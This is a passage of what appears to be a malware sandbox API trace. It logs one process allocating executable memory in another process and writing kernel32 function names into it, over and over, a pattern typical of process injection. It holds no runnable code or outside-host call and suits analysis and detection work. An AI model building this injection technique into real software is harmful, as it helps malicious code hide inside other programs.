lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.452] ResetEvent (hEvent=0x580) returned 1 [0176.452] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.452] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.452] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.452] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.452] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.453] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.453] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.453] lstrlenA (lpString="GetFileAttributesW") returned 18 [0176.453] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.453] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9e12*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9e12*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0176.454] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.455] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.455] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c660*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c660*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.455] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.456] ResetEvent (hEvent=0x580) returned 1 [0176.456] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.456] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.456] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.457] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.457] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.457] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.457] lstrlenA (lpString="GetCurrentThreadId") returned 18 [0176.457] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.457] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9e28*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9e28*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0176.459] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0176.459] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.459] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c9c0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.459] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.460] ResetEvent (hEvent=0x580) returned 1 [0176.460] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.460] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.460] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 [0176.460] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.461] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.461] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.461] lstrlenA (lpString="SetLastError") returned 12 [0176.461] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.461] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9bcc*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9bcc*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.463] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.463] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c420 [0176.463] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.463] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c420*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c420*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.464] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.464] ResetEvent (hEvent=0x580) returned 1 [0176.464] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.465] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.465] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.466] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c420 | out: hHeap=0x2150000) returned 1 [0176.466] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.466] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.466] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.466] lstrlenA (lpString="HeapValidate") returned 12 [0176.466] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.466] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9e50*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9e50*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.469] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.469] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.469] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.469] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cab0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cab0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.470] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.470] ResetEvent (hEvent=0x580) returned 1 [0176.470] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.470] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.471] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.471] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.471] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.471] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.471] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.471] lstrlenA (lpString="MultiByteToWideChar") returned 19 [0176.471] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.471] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9e60*, nSize=0x14, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9e60*, lpNumberOfBytesWritten=0xcd978*=0x14) returned 1 [0176.473] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.473] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c690 [0176.473] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.474] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c690*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c690*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.474] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.475] ResetEvent (hEvent=0x580) returned 1 [0176.475] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.475] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.475] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.475] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c690 | out: hHeap=0x2150000) returned 1 [0176.475] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.476] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.476] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.476] lstrlenA (lpString="GetTempPathA") returned 12 [0176.476] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.476] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9e76*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9e76*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.479] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.479] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0176.479] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.480] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cde0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cde0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.483] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.485] ResetEvent (hEvent=0x580) returned 1 [0176.485] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.485] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.486] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0176.486] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.487] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.488] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.488] lstrlenA (lpString="FormatMessageW") returned 14 [0176.488] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.488] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9e86*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9e86*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0176.492] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.492] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0176.492] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.493] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cd50*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cd50*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.494] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.494] ResetEvent (hEvent=0x580) returned 1 [0176.494] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.494] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.494] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.495] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cd50 | out: hHeap=0x2150000) returned 1 [0176.495] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.495] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.495] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.495] lstrlenA (lpString="GetDiskFreeSpaceA") returned 17 [0176.495] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.495] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9e98*, nSize=0x12, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9e98*, lpNumberOfBytesWritten=0xcd978*=0x12) returned 1 [0176.497] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.497] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.497] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cf30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cf30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.497] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.498] ResetEvent (hEvent=0x580) returned 1 [0176.498] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.498] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.498] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.498] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.498] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.499] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.499] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.499] lstrlenA (lpString="GetFileAttributesA") returned 18 [0176.499] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.499] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9eac*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9eac*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0176.501] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.501] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ccc0 [0176.501] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.501] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ccc0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6ccc0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.502] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.503] ResetEvent (hEvent=0x580) returned 1 [0176.503] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.504] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.504] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.504] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ccc0 | out: hHeap=0x2150000) returned 1 [0176.504] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.504] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.504] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.504] lstrlenA (lpString="GetFileAttributesExW") returned 20 [0176.504] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.505] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9ec2*, nSize=0x15, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9ec2*, lpNumberOfBytesWritten=0xcd978*=0x15) returned 1 [0176.506] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.506] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.506] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c660*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c660*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.507] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.507] ResetEvent (hEvent=0x580) returned 1 [0176.507] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.507] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.507] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.507] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.508] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.508] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.508] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.508] lstrlenA (lpString="OutputDebugStringW") returned 18 [0176.508] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.508] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9eda*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9eda*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0176.510] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.510] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cea0 [0176.510] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.510] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cea0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cea0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.511] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.511] ResetEvent (hEvent=0x580) returned 1 [0176.511] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.511] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.512] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.512] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cea0 | out: hHeap=0x2150000) returned 1 [0176.512] VirtualFreeEx 